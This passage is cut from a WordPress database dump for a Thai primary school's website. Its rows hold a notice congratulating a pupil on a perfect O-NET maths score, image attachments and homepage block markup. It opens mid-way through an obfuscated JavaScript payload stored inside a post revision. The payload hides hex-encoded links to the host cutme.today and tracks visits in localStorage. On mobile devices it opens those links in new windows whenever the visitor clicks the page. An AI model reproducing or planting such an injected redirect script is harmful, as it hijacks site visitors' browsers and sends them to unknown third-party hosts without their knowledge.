_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับ เด็กหญิงณัฐศิกุล ไชยดะรุณ นักเรียนชั้นประถมศึกษาปีที่ 6/4 เป็นผู้ที่สอบได้คะแนนเต็ม 100 คะแนน กลุ่มสาระการเรียนรู้คณิตศาสตร์ จากการทดสอบทางการศึกษาระดับชาติขั้นพื้นฐาน (O-NET)','','inherit','closed','closed','','147-revision-v1','','','2024-07-29 19:04:44','2024-07-29 12:04:44','',147,'http://watprato.ssk.in.th/?p=149',0,'revision','',0),
(151,1,'2024-07-29 19:06:09','2024-07-29 12:06:09','','434370527_122133137474202781_27711147787463551_n','','inherit','open','closed','','434370527_122133137474202781_27711147787463551_n-2','','','2024-07-29 19:06:09','2024-07-29 12:06:09','',147,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/434370527_122133137474202781_27711147787463551_n-1.jpg',0,'attachment','image/jpeg',0),
(152,1,'2024-07-29 19:06:59','2024-07-29 12:06:59','','434370527_122133137474202781_27711147787463551_n','','inherit','open','closed','','434370527_122133137474202781_27711147787463551_n-3','','','2024-07-29 19:06:59','2024-07-29 12:06:59','',147,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/434370527_122133137474202781_27711147787463551_n-2.jpg',0,'attachment','image/jpeg',0),
(153,1,'2024-07-29 19:08:18','2024-07-29 12:08:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 